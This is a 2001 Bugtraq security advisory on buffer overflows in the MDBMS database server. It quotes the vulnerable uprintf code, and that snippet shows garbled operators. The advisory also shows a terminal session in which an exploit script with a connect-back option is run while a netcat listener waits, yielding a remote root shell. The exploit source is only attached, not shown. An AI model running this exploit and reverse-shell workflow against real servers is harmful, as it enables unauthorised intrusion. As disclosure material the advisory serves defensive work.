Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
Below is faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
char b[1];
int len=strlen(outbuf), newlen;
va_list ap;
va_start(ap,s);
vsprintf(b,s,ap);
va_end(ap);
newlen=strlen(b);
while (newlen+len+10=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
strcat(outbuf,b);
FD_SET(fd,parent-wmask);
}
mu-b also found a buffer overflow in the create database
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
Information about the overflows was sent to [EMAIL PROTECTED]
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for kind response and quick update.
Exploit example:
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS = 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t hostname -b back
-t hostname: hostname to test
-b back: connect back to ip
-p port: port (default: 2223)
-d delay : delay before timeout
-o offset : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS = 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
- Connected to: 127.1 / MDBMS V0.99b9 ready.
- Address : 0x302027d / xor-mask: 0x2020202
- Return : 0x80cfe76 / using the heap ...
- Sending payload: ...
- * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
mdbms.tar.gz